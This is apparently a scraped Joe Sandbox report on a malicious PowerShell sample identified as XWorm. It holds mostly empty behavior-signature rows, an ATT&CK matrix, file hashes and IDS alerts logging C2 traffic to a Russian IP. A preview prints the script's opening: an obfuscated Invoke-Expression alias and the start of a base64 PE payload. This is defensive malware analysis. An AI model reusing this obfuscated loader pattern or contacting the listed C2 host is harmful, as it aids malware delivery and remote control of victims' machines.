Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | File Volume queried: | Jump to behavior | ||
Source: | File Volume queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 111 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 121 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 121 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
10% | Virustotal | Browse | ||
13% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
92.255.57.155 | unknown | Russian Federation | 42253 | TELSPRU | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1577168 |
Start date and time: | 2024-12-18 08:14:15 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 25s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | mhqxUdpe7V.ps1renamed because original name is a hash value |
Original Sample Name: | 372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e.ps1 |
Detection: | MAL |
Classification: | mal100.troj.evad.winPS1@6/5@0/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 3600 because it is empty
- Not all processes where analyzed, report is missing behavior information
Time | Type | Description |
---|---|---|
02:15:24 | API Interceptor | |
02:15:31 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
92.255.57.155 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | CAPTCHA Scam ClickFix, XWorm | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELSPRU | Get hash | malicious | XWorm | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | RedLine | Browse |
| ||
Get hash | malicious | RedLine, SectopRAT | Browse |
| ||
Get hash | malicious | Stealc | Browse |
| ||
Get hash | malicious | Stealc | Browse |
| ||
Get hash | malicious | Stealc | Browse |
| ||
Get hash | malicious | Stealc | Browse |
| ||
Get hash | malicious | Stealc | Browse |
| ||
Get hash | malicious | Stealc | Browse |
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1628158735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul5mxllp:NllU4x/ |
MD5: | 3A925CB766CE4286E251C26E90B55CE8 |
SHA1: | 3FA8EE6E901101A4661723B94D6C9309E281BD28 |
SHA-256: | 4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8 |
SHA-512: | F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6220 |
Entropy (8bit): | 3.7295667045435508 |
Encrypted: | false |
SSDEEP: | 96:jm5sCQQOLgkvhkvCCtJhbBuDH6hbB1iDHx:jm5sLsJhvhI |
MD5: | D98DB6FE96E16D81FE7D7F548BBE009C |
SHA1: | 39902225B1C203A864E4271EFF48705852566477 |
SHA-256: | 3096733FEC3C64D0E9ABD9EC072662CB6CD10B7B9D93D4325A877BBBA63046BD |
SHA-512: | 1314BC241C8A6570009AA720B37955D658AE951A57E6DAC6D759FD3523FBE35A910899BAACC4EB502FA6C26BDED6C7ECA2A3DE16CEF9D287BF04CEFA8798A831 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\5XHXO4M7DHTKL94017VD.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6220 |
Entropy (8bit): | 3.7295667045435508 |
Encrypted: | false |
SSDEEP: | 96:jm5sCQQOLgkvhkvCCtJhbBuDH6hbB1iDHx:jm5sLsJhvhI |
MD5: | D98DB6FE96E16D81FE7D7F548BBE009C |
SHA1: | 39902225B1C203A864E4271EFF48705852566477 |
SHA-256: | 3096733FEC3C64D0E9ABD9EC072662CB6CD10B7B9D93D4325A877BBBA63046BD |
SHA-512: | 1314BC241C8A6570009AA720B37955D658AE951A57E6DAC6D759FD3523FBE35A910899BAACC4EB502FA6C26BDED6C7ECA2A3DE16CEF9D287BF04CEFA8798A831 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.195931400416405 |
TrID: | |
File name: | mhqxUdpe7V.ps1 |
File size: | 143'864 bytes |
MD5: | d8e887ed6c14e9b9279b739aea8bb613 |
SHA1: | d5d2ade0c4896b1e7fc6318ec97dbb49ee1cb071 |
SHA256: | 372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e |
SHA512: | eb5c96ba7b726fca6edced657baf55b34157f6576f4a340a671ebe0705b06742ea281bdc2230c08aa9f8bd8b687dee6bbb2070eb16b1cdf467041301334a3f0f |
SSDEEP: | 3072:VDY+KK5sCTIO5MTe4ydXHLM8DIVI96igQycLQxvBzAqx9aKVo6sQ4aR6s:VDY+xiYIO5MTe4ydXHLM8DIVI96igQr4 |
TLSH: | C2E36C330202FD8F6B7F2F84E5043E951C68247B8B599558FACA0AA925B6520DF39DF4 |
File Content Preview: | ipconfig /flushdns...... $t0='AZAZAZIEX'.replace('AZAZAZ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQA |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-18T08:15:43.947086+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:15:44.383553+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:15:44.423184+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:15:55.993778+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:15:55.995603+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:15:58.442744+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:15:58.442744+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:07.619210+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:07.622697+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:19.244265+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:19.246948+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:28.596948+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:30.869806+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:30.871894+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:35.540659+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:35.586657+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:35.775609+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:35.777466+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:35.966382+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:35.971330+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:37.275818+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:37.278095+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:47.024809+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:47.027279+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:51.681721+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:51.687517+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:51.872600+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:51.874949+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:55.860763+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:55.863013+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:58.870117+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:02.360638+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:02.363894+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:07.338323+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:07.430548+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:07.529526+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:07.550481+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:07.798850+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:07.804066+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:19.369699+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:19.371972+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:28.636169+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:28.826358+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:28.828701+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:30.009802+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.200715+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.202778+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:30.366726+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.371295+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:30.392547+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.491088+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:30.683445+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.778035+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:38.088186+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:38.091676+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:41.526413+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:41.528389+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:45.623108+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
